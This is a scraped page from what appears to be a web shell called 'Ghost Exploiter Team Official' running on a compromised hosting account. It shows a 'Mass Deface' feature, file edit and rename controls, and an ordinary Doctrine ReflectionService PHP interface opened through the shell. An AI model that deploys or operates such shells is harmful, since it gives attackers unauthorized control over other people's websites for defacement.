webshell
Ghost Exploiter Team Official
Mass Deface
Directory >>
/
home
/
whitjouh
/
public_html
/
core
/
vendor
/
doctrine
/
persistence
/
src
/
Persistence
/
Mapping
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
+New File
Driver
--
ren
AbstractClassMetadataFa
...
14.399KB
edt
ren
ClassMetadata.php
3.552KB
edt
ren
ClassMetadataFactory.php
1.609KB
edt
ren
MappingException.php
2.288KB
edt
ren
ProxyClassNameResolver.php
0.366KB
edt
ren
ReflectionService.php
1.675KB
edt
ren
RuntimeReflectionServic
...
2.571KB
edt
ren
StaticReflectionService
...
1.401KB
edt
ren
<?php declare(strict_types=1); namespace Doctrine\Persistence\Mapping; use ReflectionClass; use ReflectionProperty; /** * Very simple reflection service abstraction. * * This is required inside metadata layers that may require either * static or runtime reflection. */ interface ReflectionService { /** * Returns an array of the parent classes (not interfaces) for the given class. * * @psalm-param class-string $class * * @return string[] * @psalm-return class-string[] * * @throws MappingException */ public function getParentClasses(string $class); /** * Returns the shortname of a class. * * @psalm-param class-string $class * * @return string */ public function getClassShortName(string $class); /** * @psalm-param class-string $class * * @return string */ public function getClassNamespace(string $class); /** * Returns a reflection class instance or null. * * @psalm-param class-string<T> $class * * @return ReflectionClass|null * @psalm-return ReflectionClass<T>|null * * @template T of object */ public function getClass(string $class); /** * Returns an accessible property (setAccessible(true)) or null. * * @psalm-param class-string $class * * @return ReflectionProperty|null */ public function getAccessibleProperty(string $class, string $property); /** * Checks if the class have a public method with the given name. * * @psalm-param class-string $class * * @return bool */ public function hasPublicMethod(string $class, string $method); }
<=Back
Liking